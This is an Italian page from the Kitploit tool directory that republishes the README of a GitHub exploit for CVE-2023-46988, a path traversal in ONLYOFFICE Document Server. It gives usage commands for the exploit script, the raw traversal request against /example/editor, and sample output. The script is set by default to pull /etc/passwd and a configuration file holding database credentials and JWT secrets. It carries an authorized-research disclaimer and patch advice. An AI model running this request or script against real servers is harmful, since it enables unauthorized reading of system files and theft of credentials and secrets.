Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988: Exploit di Path Traversal in ONLYOFFICE | Kitploit
Strumenti/GitHubGitHub/mihat2/onlyoffice-path-traversal
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988: Exploit di Path Traversal in ONLYOFFICE

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di Path Traversal in ONLYOFFICE (CVE-2023-46988)

📌 Panoramica

Questo script sfrutta una vulnerabilità di path traversal in ONLYOFFICE Document Server (CVE-2023-46988) che consente a utenti non autorizzati di copiare file arbitrari dal server. La vulnerabilità è presente nell'endpoint /example/editor, dove il parametro fileExt può essere manipolato per accedere a file sensibili di sistema e di configurazione.

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di ricerca autorizzata sulla sicurezza.
L'uso non autorizzato contro sistemi senza permesso esplicito è illegale e non etico.

🛠 Caratteristiche

  • Recupera i file sensibili predefiniti:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json (contiene )
credenziali del database e segreti JWT
  • Specifica un qualsiasi percorso file da recuperare con l'argomento --file.
  • Supporta il proxy opzionale per l'intercettazione con Burp Suite (--proxy).
  • Supporta la verifica SSL opzionale (--verify).
  • Corregge i problemi di codifica durante il download di file con caratteri speciali.
  • 🚀 Utilizzo

    1️⃣ Utilizzo Base (Recupero File Predefiniti)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost
    

    Questo recupera:

    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json

    2️⃣ Recupera un File Personalizzato (es. /etc/hosts)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --file /etc/hosts
    

    3️⃣ Abilita il Proxy (es. Burp Suite su 127.0.0.1:8080)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --proxy
    
    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
    

    4️⃣ Abilita la Verifica SSL

    root@kitploit:~
    python onlyoffice_exploit.py https://example.local --verify
    

    5️⃣ Combina Proxy e Verifica SSL

    root@kitploit:~
    python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
    

    🔍 Come Funziona

    1. Invia una richiesta a /example/editor con un parametro fileExt malizioso:
      root@kitploit:~
      GET /example/editor?fileExt=../../../../../../../../etc/passwd
      
    2. Estrae l'URL di reindirizzamento dalla risposta.
    3. Analizza il nome del file reindirizzato dalla risposta.
    4. Corregge i problemi di codifica per i caratteri speciali nei nomi dei file.
    5. Scarica il file da /example/download?fileName=<nome_file_estratto>.

    🛠 Esempio di Output

    root@kitploit:~
    [*] Target URL: http://localhost
    [*] Attempting to retrieve: /etc/passwd
    [*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
    [+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
    [+] Extracted File Name: .passwd
    [*] Downloading file: http://localhost/example/download?fileName=.passwd
    [+] File downloaded successfully: .passwd
    

    🔒 Mitigazione

    ONLYOFFICE ha corretto questa vulnerabilità nell'aggiornamento di febbraio 2024.
    Gli utenti dovrebbero aggiornare all'ultima versione per proteggere i propri server.

    🐜 Licenza

    Questo progetto è concesso in licenza con la MIT License – consulta il file LICENSE per i dettagli.

    Scarica lo strumento